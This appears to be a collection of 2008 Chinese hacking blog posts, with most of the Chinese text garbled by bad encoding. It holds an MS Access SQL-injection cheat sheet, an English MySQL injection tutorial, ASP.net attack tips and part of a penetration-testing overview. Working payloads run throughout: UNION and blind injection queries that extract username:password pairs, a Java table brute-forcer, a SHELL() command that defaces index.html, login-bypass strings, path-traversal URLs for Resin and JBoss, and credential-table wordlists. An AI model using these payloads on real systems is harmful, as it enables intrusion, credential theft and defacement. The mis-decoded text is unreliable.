SQL��ѯ��ע��

ע�ͷ�

Access��û��ר�ŵ�ע�ͷ��.��"/*", "--"��"#"��û��ʹ��.��ǿ��ʹ�ÿ��ַ�"NULL"(%00)��:

' UNION SELECT 1,1,1 FROM validTableName%00

�﷨��Ϣ

"[Microsoft][Driver ODBC Microsoft Access]"

��ִ��

��֧��.

��ϲ�ѯ

Access֧��ϲ�ѯ,UNION��FROM�ؼ��ֱ��ʹ��һ��Ѿ��ڵı��.

��ѯ

Access֧�ָ��ѯ(��:"TOP 1"��ص�һ�е��) :

' AND (SELECT TOP 1 'someData' FROM validTableName)%00

LIMIT֧��

LIMIT��֧��,��ڲ�ѯ�п��"TOP N"��Ʒ��ݵ��:

' UNION SELECT TOP 3 AttrName FROM validTableName%00 : ��䷵��(ǰ)3 ��.

�ò�ѯ��0��

�ڽű��ڷ��ص�HTML��ֻ��ʾ��һ��ѯ�Ľ��ʱ��ǳ��:

' AND 1=0 UNION SELECT AttrName1,AttrName2 FROM validTableName%00

�ַ��

��֧��CONCAT()��. ��ʹ��"&"��"+"��ַ��.��ʹ�õ�ʱ��URLencode��:

' UNION SELECT 'web' %2b 'app' FROM validTableName%00 : ��"webapp"
' UNION SELECT 'web' %26 'app' FROM validTableName%00 : ��"webapp"

��ַ��

MID()��:

' UNION SELECT MID('abcd',1,1) FROM validTableName%00 : �� "a"
' UNION SELECT MID('abcd',2,1) FROM validTableName%00 : �� "b"

�ַ��

LEN()��:

' UNION SELECT LEN('1234') FROM validTableName%00 : �� 4

��WEB·��

��ͨ��һ��ڵĿ��SELECT��.Access��Ӧһ��·��Ĵ��Ϣ.:

' UNION SELECT 1 FROM ThisIsAFakeName.FakeTable%00

ȡ�ַ��ASCIIֵ

ASC()��:

' UNION SELECT ASC('A') FROM ValidTable%00 :��65 ('A'��ASCIIֵ)

ASCIIֵת��Ϊ�ַ�

CHR()��:

' UNION SELECT CHR(65) FROM validTableName%00 : �� 'A'

IF��

��ʹ��IIF()��. �﷨ : IIF(condition, true, false) :

' UNION SELECT IIF(1=1, 'a', 'b') FROM validTableName%00 : �� 'a'

ʱ��ӿ�

��BENCHMARK()��SLEEP()�ĺ��,��ǿ��ʹ�ô��(�߸��)�Ĳ�ѯ��ﵽ��Ч��.��鿴�ο�.

��֤�ļ��Ƿ��

��ע��ʱ��ʹ��:

' UNION SELECT name FROM msysobjects IN '\boot.ini'%00 : (��ļ��)��һ��Ϣ:it informs that the database format was not recognized.

��½�

��һ��򵥵Ĳ½�access��java��.��д��Ϊ�˸��õĽ��Ͳ½��ԭ��:

static private String columnErrorMessage = "...";
static private String accessError = "...";

[...]

public String bruteTableName(Request r) { // 0

   String resp = new String();
   String[] table = { "tab_name1", "tab_name2", ..., "tab_nameN" }; // 1

   for(int i = 0; i < table.length; i++) {

      resp = sendInjection(r, " ' UNION SELECT 1 FROM " + table[i] + "%00"); // 2

      if(resp.contains(columnErrorMessage) || !resp.contains(accessError)) // 3
           return table[i];
   }

   return null;
}

bruteTableName()�Ĳ��һ��Ϊ"Request"�Ķ��(��ע��0).��ӿ� sendInjection() (��ע��2)��Լ��ѯ:

' UNION SELECT 1 FROM table[i]%00

table[i]�Ǳ��б��е�һ��Ԫ��(��ע��1). ��ƪ��µ�ĩβ�ҵ�һ��С�ı��б�.��ע��2��, sendInjection()��ύע��Ļ�Ӧhtml��.��resp�� columnErrorMessage �ַ��(��ע��3),��ϲ��,��ҵ��һ��ڵı�. columnErrorMessage ��UNION��ѯ��ʹ��˺��ѯ��ͬ�ľ��صĴ��Ϣ.��,��ص��Ϣ��Ǳ��,��Ǿ��Ŀ��.

��½�

��Ҫһ��֪�ı��ѯ��е��Ŀ:

' UNION SELECT fieldName[j],1,1,1 FROM validTableName%00

��Խ��޸�һ��(��table��Ϊfieldname),��,��᷵��һ��в��ڵĴ��Ϣ.

�ƹ��½

�û��: ' OR 1=1%00 (or " OR 1=1%00)

��: (��)

��ö��

�� : ��ԭ��Ѿ��JBoss(һ��ʹ��Access��©��.jsp�ű�)�ϲ��ͨ�� ,��ǲ��ұ�֤��Ļ��ͬ��.

ͨ��,��SQLע��©��,��URL��һ��"'"��,�㽫��õ�һЩ��Ϣ,��:

Error (...) syntax (...) query (...) : " Id=0' "

��Ϣ��Եó��ǰ��һ��"ID".ͨ��Ա��ʹ��ͬ��URL��,��.��֪��һ��,�Ϳ��ͨ��mssql��ö��:

' GROUP BY Id%00

��㽫��һ��µĴ��Ϣ,��һ��µ��.��Լ��ö��ı��:

' GROUP BY Id, SecondAttrName, ...%00

ֱ��ȡ��еı��.

��ϵͳ�Ľ��

��Щ��Ĭ�ϲ��

��ȫ��ʾ

��ͨ��޸�ע��һЩ��ĺ��ʹ��(��SHELL(),�ȵ�...):

\\HKEY_LOCAL_MACHINE\Software\Microsoft\Jet\4.0\engines\SandboxMode

��Ĭ��ֵ��2,��Щ��Ĭ�ϲ��.��ҽ��ܵ�ע��ֵ��Ϊ0��.

��ȡ��ǰĿ¼

��Ҫһ��֪�ı��ѯ��е��Ŀ:

' UNION SELECT CurDir(),1,1 FROM validTableName%00

ִ��ϵͳ��

SHELL()��ִ��ϵͳ��:

' AND SHELL('cmd.exe /c echo owned > c:\path\name\index.html')%00

Access��ϵͳ��

��Щϵͳ��Ĭ�ϲ��ɷ��

MSysAccessXML

��а��:

Id
LValue
ObjectGuid
ObjectName
Property
Value

MSysACEs

��а��:

ACM
FInheritable
ObjectId
SID

MSysObjects

��Ի�ñ��:

Connect
Database
DataCreate
DataUpdate
Flags
ForeignName
Id
Lv
LxExtra
LvModule
LvProp
Name
Owner
ParentId
RmtInfoLong
RmtInfoShort
Type

��ѯ��ݿ��еı��:

' UNION SELECT Name FROM MSysObjects WHERE Type = 1%00

Accessäע(��Щ��½��)

��һ��:�½��

��ʹ��ṩ��ֵ��½��.ע��ѯ��:

' AND (SELECT TOP 1 1 FROM TableNameToBruteforce[i])%00

��ύע��ѯ��,��õ�HTML��غ��ҳ��һ��,��.(��Ϊ "AND 1"�Բ�ѯû��κ�Ӱ��).

�ڶ��: �½��

��ָ��,ʹ��²�ѯ:

' AND (SELECT TOP 1 FieldNameToBruteForce[j] FROM table)%00

�ú͵�һ��ͬ��ķ��ж��Ƿ��.

��:�½��ݵ��

�ڽ�һ��ж��,��֪��ݵ��. ��Ĳ�ѯ�н��"TAB_LEN"��:

' AND IIF((SELECT COUNT(*) FROM validTableName) = X, 1, 0)%00

��"X" �Ǵ��0��ֵ.��ʹ��Ϸ��ж�"X"��׼ȷֵ.

��Ĳ�:�½��ݵĳ��

��ͨ��ȡ"ATTRIB"�еĵ�һ�е��ݳ��:

' AND IIF((SELECT TOP 1 LEN(ATTRIB) FROM validTableName) = X, 1, 0)%00

��ͨ��½⵽ "ATTRIB"��еڶ��е��TAB_LEN�е��ݵĳ�� (��N��ֵ��2��TAB_LEN(��ǰ��Ѿ��)֮��) :

' AND IIF((SELECT TOP N LEN(ATTRIB) FROM validTableName WHERE ATTRIB<>'value1' AND ATTRIB<>'value2' ...(etc)...) = KKK,1,0)%00

"KKK" Ϊ��0��ֵ,ʹ��ATTRIB<>'valueXXX'��ԭ��Ǳ��ѡ��һ��ض��½�.��뵽�ķ��ǽ�֮ǰ�õ��"TOP N"�е�ֵ�ų��,Ȼ��ʣ�µ��о��ڲ½��.��Ȼ,��һ��ǰ��"ATTRIB"��.��һ��:

A1	A2	A3
1111	2222	3333
0000	4444	oooo
aaaa	bbbb	cccc

��ȡ��һ�е��ݵĳ��:

' AND IIF((SELECT TOP 1 LEN(A1) FROM Table) = KKK, 1, 0)%00
' AND IIF((SELECT TOP 1 LEN(A2) FROM Table) = KKK, 1, 0)%00
' AND IIF((SELECT TOP 1 LEN(A3) FROM Table) = KKK, 1, 0)%00

Ȼ��Ϳ��ȡ�ڶ��е��ݵĳ��(��A1Ϊ��) :

' AND IIF((SELECT TOP 2 LEN(A1) FROM Table WHERE
A1 <>'1111') = KKK, 1, 0)%00
' AND IIF((SELECT TOP 2 LEN(A2) FROM Table WHERE
A1 <> '1111') = KKK, 1, 0)%00
' AND IIF((SELECT TOP 2 LEN(A3) FROM Table WHERE
A1 <> '1111') = KKK, 1, 0)%00

��Ҳһ��:

' AND IIF((SELECT TOP 3 LEN(A1) FROM Table WHERE
A1 <>'1111' AND A1 <> '0000') = KKK, 1, 0)%00
' AND IIF((SELECT TOP 3 LEN(A2) FROM Table WHERE
A1 <> '1111' AND A1 <> '0000') = KKK, 1, 0)%00
' AND IIF((SELECT TOP 3 LEN(A3) FROM Table WHERE
A1 <> '1111' AND A1 <> '0000') = KKK, 1, 0)%00

��,�ڲ½��һ��Ժ��ݵĳ��(��2��TAB_LEN��),��õ�֮ǰ��е��(��Ҫ��WHERE��).

��岽:�½��

��蹥��Ѿ�֪��˱��,��ʹ��Ĳ�ѯ:

' AND IIF((SELECT TOP N MID(ATTRIBxxx, XXX, 1) FROM validTableName WHERE ATT_key <>'value1' AND ATT_key <>'value2'
... etc ... ) = CHAR(YYY), 1, 0)%00

"N"��Ҫ�½��, "XXX"�� "ATTRIBxxx"�ĵ�X��ֽ�, "ATT_key"�Ǳ��ĵ��"YYY"��һ��0��255֮��.(��һ��ַ��ASCII��).��ȻҪʹ��ǰ��ᵽ�ķ��½��е��.

��/��(�ֵ�)

��/��(�ֵ�)

��һ��С�ı�/��ֵ�,�ڲ½��Ҳ��õĵ�:

account, accnts, accnt, user_id, members, usrs, usr2, accounts, admin, admins, adminlogin, auth, authenticate, authentication, account, access;
customers, customer, config, conf, cfg;
hash;
login, logout, loginout, log;
member, memberid;
password, pass_hash, pass, passwd, passw, pword, pwrd, pwd;
store, store1, store2, store3, store4, setting;
username, name, user, user_name, user_username, uname, user_uname, usern, user_usern, un, user_un, usrnm, user_usrnm, usr, usernm, user_usernm, user_nm, user_password, userpass, user_pass, , user_pword, user_passw, user_pwrd, user_pwd, user_passwd;

Full SQL Injection Tutorial (MySQL)

ItPro — Tue, 27 May 2008 08:09:07 +0800

SQL Injection Tutorial by Marezzi (MySQL)

In this tutorail i will describe how sql injection works and how to
use it to get some useful information.

First of all: What is SQL injection?

It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(in shortly).

1.SQL Injection (classic or error based or whatever you call it) :D

2.Blind SQL Injection (the harder part)

So let's start with some action :D

1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be http://www.site.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection :)

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <-- no error

http://www.site.com/news.php?id=5 order by 2/* <-- no error

http://www.site.com/news.php?id=5 order by 3/* <-- no error

http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it :)

what we need is convert() function

i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version :D

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good :D)

we know that table admin exists...

now to check column names.

http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up :)

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice :)

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser :D

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

That's all in this part, now we can proceed on harder part :)

2. Blind SQL Injection

Blind injection is a little more complicated the classic injection but it can be done :D

I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it :D

Let's start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2 <--- this is false

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when select don't work then we use subselect

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend :)

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)

4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

cause that makes you better SQL INJECTOR :D

Hope you learned something from this paper.

Have FUN! (:

To be continued and updated...

��ASP.net��վ�ľ��

ItPro — Sat, 24 May 2008 09:03:59 +0800

1��
��һ��.net��վʱ
ͨ��ע��û�
��һѡ��ϴ��жϵ�©�� ͼƬͷGIF89A ˳��Ĺ�

2��
�ڶ��־��ע��, ��?id=xx��ӵ�� " ' "
һ�� NBSI ��D��SCAN ��Է��BUGҳ��
��ҹ��ڴ��.net��ʹ��MSSQL��ݿ�
��ע��Ҳ��Դ�login�� ʵ��Ŀǰ�ĳɹ��75%

3��
��͵�,��û��Ϣ��Ե�ʱ�� Ϳ�ס��
��ҿ��Կ��һƪ ��ע�� ,��ݿ��WEB��һ��
ֱ��д��LOG�� ַ� ��Ա��POST��
Ҳ��WsockExpertץ�� search.aspx?��ֵ��ע��
��ȡ·��͸��ð�� ֻҪweb.config��
��:

'��Ϊoff��ʧ��

��ôֻ��Ҫ��һ��ļ��ǰ
��allyesno.aspx ��Ϊ~allyesno.aspx ˳��WEB��·��

4��
��ã��ֵ�½��̨��
��:http://allyesno.cnblogs.com/admin/login.aspx
��󷵻ص�http://allyesno.cnblogs.com/admin/error.aspx
��http://allyesno.cnblogs.com/admin%5Cindex.aspx˵��Ĺ��֤��

5��
��̨�Ĺ��
'or''='
'or''='
��
'or'='or'
'or'='or'

��͸��(Penetration Testing)

ItPro — Sat, 17 May 2008 15:40:57 +0800

��͸��(Penetration Testing)

Ŀ¼

Author : ZwelL
Last Updated : 2007.12.16

�㡢ǰ��
һ��
��ƶ�ʵʩ��
��
�ġ��ɱ��
�塢��Թ��еķ��ռ��
�ο��
FAQ��

��ֵ��/THE ART OF INTRUSION��
��͸��Щ��֮��
��Ҫ��Ͷ��ߣ��ոߡ��ұ��רҵ��Ethical Hackers��ս��
��˵��ô�ã�Ϊʲô��͸��Թ��й��չ�Ĳ��Ǻܻ��أ�
��ֻ��˵��ģ�һ��ġ��͸��ԵĹؼ��û��֤��Ĳ��Խ��Ƶġ��û��֪��Ǯ֤��ϵͳ��Ժ��Լ��İ�ȫ�ȼ��һ��ʲô��򡣵��Ǻ��Ȼ��û��һ��רҵ�Ҿ��ḻ�İ�ȫ�Ŷӵģ��й��Ƚ��ء��ҽӴ��һЩ��͵İ�ȫ��˾��е�һЩ��͸��Թ��Ա��ˮƽ�ǶԲ�ס��Щ�۸�ģ��ҴӲ��Թ��̵��Ҳ�ǲ��ġ��ҹ��Ժ��Ĺۣ��ʱһ��氲ȫ��Ա�ļ��кܴ�̶ȵĸĹۣ��һ��ҵ��͸��Ի��һ��Ƚ��̵��⣬Ҳ�Ὣ��Ϊһ��IT��Ƶķ�ʽ��뵽��ȥ��͸��Ե�רҵ��ҵ��Խ��Խ��졣

��ƶ�ʵʩ��

ʵʩ��Ӧ��ɲ��Է��ͻ�֮��й�ͨЭ�̡�һ��ʼ��Է��ṩһ�ݼ򵥵��ʾ��˽�ͻ��Բ��ԵĻ��ݰ��£�

Ŀ��ϵͳ��ܡ��ص㱣��ԡ�
�Ƿ��ƻ��
�Ƿ��ҵ��У�
��֮ǰ�Ƿ�Ӧ��֪��ز��Žӿ��ˣ�
��뷽ʽ��
��Ƿ��ɹ��Ǿ��ܵķ��ֶ��⣿
��͸��Ƿ��Ҫ��Ṥ�̣�
��

�ڵõ��ͻ��ɲ��Է��дʵʩ��岢�ύ��ͻ��ɿͻ��ˡ��ɺ󣬿ͻ�Ӧ��Բ��Է��ί��Ȩ����ĵ��ֱ�Ӧ��ݣ�

ʵʩ��֣�
...
��ί��Ȩ��֣�
...

��

1��Ϣ�ռ��

��Ϣ�ռ�:
��һ��ֱ�ӶԱ��Ŀ��ɨ�裬Ӧ��ȴ��һЩ��Ϣ��Google Hacking�� Whois��ѯ�� DNS��Ϣ��ǽ��Ṥ��ѧ�Ļ��ﻹ��Ӧ��ʼ��б�/��л�ȡĿ��ϵͳ��һЩ��Ե��Ϣ��ڲ�Ա��ʺ��ɣ��ʶ��ʽ��ʼ��ϵ��ַ�ȣ��

1.ʹ��whois��ѯĿ��DNS��
2.nslookup
>set type=all
>
>server
>set q=all
>ls -d

�漰�Ĺ��߰��Google,Demon,webhosting.info,Apollo,Athena,GHDB.XML,netcraft,seologs��֮�⣬��ر��һ��ʹ��Googlebot/2.1�ƹ�һЩ�ļ��Ļ�ȡ��ơ�

Google hacking �г��õ�һЩ�﷨��
1.��ָ��վ��ؼ��site��վ��site:www.nosec.org��ʹ��site:nosec.org��µ��ҳ�档��ʹ��site:org.cn��й��ŵ��վ��
2.��URL��ַ�еĹؼ��inurl��վ�㣬��Գ��inurl:asp?id=
3.��ҳ��еĹؼ��intitle��һЩ��½��̨��Գ��ʹ��intitle:"admin login"

Ŀ��ϵͳ��Ϣ�ռ�:
ͨ��һ��Ӧ��Լ򵥵��Ŀ��ϵͳ��ṹ��繫˾��ӹ�˾IP��ַ�ֲ��VPN��ַ�ȡ��ر�Ҫע��һЩ�Ƚ�ƫ�ŵ�HOST��Ƶ�ַ��һЩbackup��ͷ��temp��ص��ܿ��ܾ��һ̨��ݷ��䰲ȫ�Ժܿ��Ĳ��
�ӻ�ȡ�ĵ�ַ�б��н��ϵͳ�жϣ��˽��֯�ܹ��ϵͳʹ���õķ��Ŀ��IP��ɨ�衣
�˿�/��Ϣ�ռ�:
��һ��Ѿ��Կ�ʼֱ�ӵ�ɨ��漰�Ĺ��߰��nmap,thc-amap

1.��ʹ�õĲ��
nmap -sS -p1-10000 -n -P0 -oX filename.xml --open -T5

Ӧ��Ϣ�ռ��httprint��SIPSCAN��smap
��б�Ҫ��SNMP�ó��˵һ�£��ΪĿǰ��Ӫ�̡��ҵ�ڲ��ά��̨ͨ��SNMP��ݴ��䣬�󲿷��ʹ��Ĭ�Ͽ��ģ��private����߿��ͨ��ռ��ܶ��Ч��Ϣ��snmp-gui��HiliSoft MIB Browser��mibsearch��net-snmp��һЩ�ܺõ��Դ��

2��©��ɨ��

��һ��Ҫ��Ծ��ϵͳĿ��С��ͨ��һ��Ϣ�ռ��Ѿ��õ��Ŀ��ϵͳ��IP��ַ�ֲ��Ӧ��Ѿ�ͨ��һЩ��˳��ļ��Ŀ�꣬��ʱ��ǾͿ��ǽ��Ե�©��ɨ�衣��м��Խ��У�

��ϵͳ��Ĺ��У�ISS, Nessus, SSS, Retina, �쾵, ��

��WEBӦ�ò��Ĺ��У�AppScan, Acunetix Web Vulnerability Scanner, WebInspect, Nstalker

��ݿ�Ĺ��У�ShadowDatabaseScanner, NGSSQuirreL

��VOIP��Ĺ��У�PROTOS c07 sip(�ڲ��ֱ��ߺ��)�Լ�c07 h225, Sivus, sipsak�ȡ�

��ʵ�ϣ�ÿ��͸��Ŷӻ��ٶ��Լ��Ĳ��Թ��߰��©��ɨ��һ��Ծ��Ӧ�õĹ��Ҳ�Ƚϸ��Ի��

3��©��

��ʱ��ͨ��/Ӧ��ɨ��ǿ��©��ɨ�貿�֣�ֱ�ӵ�©��á��Ϊ�ܶ��Ǹ��Ŀ��/Ӧ�õİ汾�Ϳ��Ե�һЩ��ȫ��վ�ϻ�ȡ��Ը�Ŀ��ϵͳ��©��ô��룬��milw0rm, securityfocus,packetstormsecurity��վ��涼��Ӧ��ģ�顣ʵ��û�У��Ҳ��Գ��GOOGLE��Ӧ�� exploit��Ӧ�� vulnerability��ȹؼ��֡�

��Ȼ��󲿷��㶼��Բ��ô�鷳��һЩ��߿ɹ��ʹ�ã��ĵ��metasploit�ˣ��һ��Դ��ѵ�©��ù��ƽ̨��Ķ�˵��棬��Ϳ��Ӱ��ǰ�壨top 100)��һ��˵��Ҳ�ܴ��˽⵽��ˡ��֮�⣬��ǹ�˾��㹻��moeny��ڹ��Ļ��CORE IMPACT��൱ֵ�ÿ��ǵģ��Ȼ˵�۸�ܸߣ��ȴ�Ǳ�ҵ�繫��͸��Է��̩ɽ��ϲ��ȫ�Զ��û��ǽ��ܲ��ˣ��ô��ȥ��CANVAS��˵�в��0DAY��metasploitһ��Ҫ�ֶ��в��Եġ��һ��Ҫ�ἰһ�µ�Exploitation_Framework��൱��һ��©��ô��ߣ��в�ͬ��ԣ��ͬƽ̨��ô��ռ��Ҳ��Ϊ��Ҳά��һ��exploit�⣬��Ҳο��Ҳ��ʹ�á�

��ᵽ��ϵͳ��еģ��WEB��棬ע�빤��NBSI, OWASP SQLiX, SQL Power Injector, sqlDumper, sqlninja, sqlmap, Sqlbftools, priamos, ISR-sqlget*�ȵȡ�

��ݿⷽ��Ĺ��У�

��ݿ� ��б�

Oracle��1521�˿ڣ�: Ŀǰ��Ҫ��·��İ�ȫ��⣺
1��TNS��򹥻��sid��Ϣй¶,ֹͣ��ȣ�
2��Ĭ��˺�(default password list)
3��SQL INJECTION��봫ͳ��˼��̫һ��
4��ڱȽ��ˡ� thc-orakel, tnscmd, oscanner, Getsids, TNSLSNR, lsnrcheck, OAT, Checkpwd, orabf

MS Sql Server��1433��1434�˿ڣ�

Mysql��3306�˿ڣ�

DB2��523��50000��50001��50002��50003�˿ڣ� db2utils

Informix��1526��1528�˿ڣ�

��Web��Ĺ��У�

WEB�� б�**

IIS IISPUTSCANNER

Tomcat ��/admin��/manager��Ŀ¼��⣬Ŀ¼�б�Ҳ��Tomcat����⡣��5.*�汾�е�http://127.0.0.1/;index.jsp
http://www.example.com/foo/\../manager/html
http://www.example.com:8080/examples/servlets/servlet/CookieExample?cook...
http://www.example.com:8080/servlets-examples/servlet/CookieExample?cook...

JBOSS jboss��©��٣��ϰ汾��8083�˿��%��ŵ�©��
GET %. HTTP/1.0��Ի�ȡ��·��Ϣ��
GET %server.policy HTTP/1.0��Ի�ȡ��ȫ��ĵ��
��Ҳ��ֱ�ӷ��GET %org/xxx/lib.class��ȡ��õ�java��ʹ��һЩ��빤�߻�ԭԴ��롣

Apache

Resin http://victim/C:%5C/
http://victim/resin-doc/viewfile/?file=index.jsp
http://victim/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml
http://victim/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class
http://victim/[path]/[device].[extension]
http://victim/%20..\web-inf
http://victim/%20
http://victim/[path]/%20.xtp

WebLogic

Web��ȫ��ҪΧ�Ƽ��У�

Information Gathering��Ҳ��һ��Ϣй©��쳣��µ�·��й©��ļ��鵵��ҵ�
Business logic testing��ҵ��߼��ܶ��ڽ��ҵ��ƹ��ƭ�ȵ�
Authentication Testing��֤�롢��޴��Ƶȣ��֮��ǿ��ܲ��ܱ��ƽ��˵�ݲ��ͨ��֤��Ƚ�ֱ�ӵľ��ǡ�Ĭ�Ͽ����
Session Management Testing��Ự��COOKIEЯ��֤��Ϣʱ��Ч
Data Validation Testing��֤��ˣ��SQL Injection��Cross Site Script�ȵ�

Ŀǰ��ܹ��ҵ��ܹ��ڽ��Web��ԵĹ��ߣ��ݲ�ͬ�Ĺ��ܷ��Ҫ�У�

ö�٣�Enumeration�� DirBuster, http-dir-enum, wget
��ڴ��๤�ߣ�paros, webscarab, Burp Suite

��WebService��ԵĲ��һЩ�в��Ǻܳ��Ĺ��ߣ��磺wsbang��wschess��wsmap��wsdigger��wsfuzzer

��һ��ֵ��һ��ǣ��ܶ��͸��ŶӶ��Լ��Ĳ��Թ��0DAY��룬���SQLע�빤�ߣ��ע�빤�ߣ��NBSI�ȣ�Ŀǰ��С��ҵ��Ǹ��վ��/��ݿ��еģ��Դ��Ŀ��ϵͳʹ�õ�һЩ��ԱȽ�ƫ�ŵ��ݿ�ϵͳ��INFORMIX��DB2��ȣ��ϻ��漰��˵��롣��ʱ��͸��ŶӾͿ��ʹ��ϰ�ߵĲ��Թ��ߡ�

��߻��Ĺ��У�WifiZoo

4��Ȩ��

��ǰ��һЩ��У��Ѿ��õ��һЩ��Ȩ�ޣ��Ƕ��ڽ�һ��˵ȴ��ǲ��磺��ܺ��׵��ܹ��ȡOracle��ݿ�ķ��Ȩ�ޣ��ǵõ��UNIX(AIX,HP-UX,SUNOS)��һ��˺�Ȩ�ޣ��ǵ��н�һ��͸��Ե�ʱ��ˡ��㷢��û��㹻��Ȩ�޴�һЩ��洢�ļ��û�а취��װһ��SNIFFER��û��Ȩ��ִ��һЩ�ܻ����ʱ��Ȼ��Ȼ�ľͻ��뵽Ȩ��;��ˡ�

ĿǰһЩ��ҵ��ڲ��Ǵ��ںܴ�һ��ģ��ǿ��ѹ��û��һЩ��Ӧ�ý��в��£��ʱ��¡��ʱ��͸��Ա�ĺû��ˡ��̸֮��һ��Ȩ�޵�Oracle�˺Ż��AIX�˺Ż��ϵ��root��Ϊ��ʵ��

5��ƽ�

